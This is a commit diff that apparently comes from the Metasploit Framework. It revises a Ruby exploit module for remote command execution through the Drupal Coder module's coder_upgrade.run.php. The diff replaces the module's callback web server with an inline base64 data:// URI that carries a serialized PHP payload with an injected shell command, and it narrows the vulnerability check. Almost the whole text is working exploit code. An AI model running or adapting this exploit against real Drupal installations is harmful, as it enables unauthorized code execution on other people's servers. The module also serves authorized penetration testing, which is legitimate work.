
Commit dadafd1

committed
Use data:// instead of bogus web server and check() improvements.
1 parent 780e83d commit dadafd1


1 file changed

+6
-16
lines changed


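--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::HttpClient
-include Msf::Exploit::Remote::HttpServer
 
 def initialize(info={})
 super(update_info(info,
@@ -27,7 +26,7 @@ def initialize(info={})
 'License' => MSF_LICENSE,
 'Author' =>
 [
-'Nicky Bloor', # discovery
+'Nicky Bloor <[email protected]>', # discovery
 'Mehmet Ince <[email protected]>' # msf module
 ],
 'References' =>
@@ -55,9 +54,7 @@ def initialize(info={})
 
 register_options(
 [
-OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
-OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
+OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
 ]
 )
 end
@@ -67,15 +64,14 @@ def check
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
 )
-if res && res.code == 200
+if res && res.body.include?('file parameter is not setNo path to parameter file')
 Exploit::CheckCode::Appears
 else
 Exploit::CheckCode::Safe
 end
 end
 
-def on_request_uri(cli, _request)
-print_status("Incoming request detected...")
+def exploit
 p = ''
 p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
 p << 's:11:"theme_cache";s:16:"theme_cache_test";'
@@ -88,20 +84,14 @@ def on_request_uri(cli, _request)
 p << ':"f --help && '
 p << payload.encoded
 p << ' #";s:4:"name";s:4:"test";}}}'
-print_status("Sending payload...")
-send_response(cli, p)
-end
-
-def exploit
-start_service
+payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
 send_request_cgi(
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
 'encode_params' => false,
 'vars_get' => {
-'file' => get_uri
+'file' => payload
 }
 )
-stop_service
 end
 end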
